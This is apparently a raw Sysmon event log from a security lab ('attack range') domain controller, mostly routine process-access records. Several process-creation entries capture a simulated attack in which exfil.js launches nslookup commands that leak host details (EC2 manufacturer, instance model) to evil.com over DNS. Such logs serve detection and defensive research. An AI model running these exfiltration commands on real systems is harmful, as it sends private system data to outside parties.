14:16:18.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-003F-000000005F02}7688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B2-629A-003F-000000005F02}7688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.921{2E1864BB-17B2-629A-003F-000000005F02}7688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000197007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.904{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-FF3E-000000005F02}7360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.904{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-FF3E-000000005F02}7360C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.904{2E1864BB-17B2-629A-FF3E-000000005F02}73607512C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-FE3E-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.900{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FF3E-000000005F02}7360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FE3E-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-17A1-629A-783D-000000005F02}55527356C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-FE3E-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.893{2E1864BB-17B2-629A-FE3E-000000005F02}5792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnylewz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.882{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqted.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.866{2E1864BB-17B2-629A-FC3E-000000005F02}79447288C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-FD3E-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FD3E-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.851{2E1864BB-17B2-629A-FB3E-000000005F02}79924468C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-FD3E-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.864{2E1864BB-17B2-629A-FD3E-000000005F02}1044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-FB3E-000000005F02}7992C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqted.tmp 2>&1 10341000x8000000000000000196987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.836{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-FC3E-000000005F02}7944C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.836{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-FC3E-000000005F02}7944C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.836{2E1864BB-17B2-629A-FC3E-000000005F02}79447288C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-FB3E-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.819{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-FC3E-000000005F02}7944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 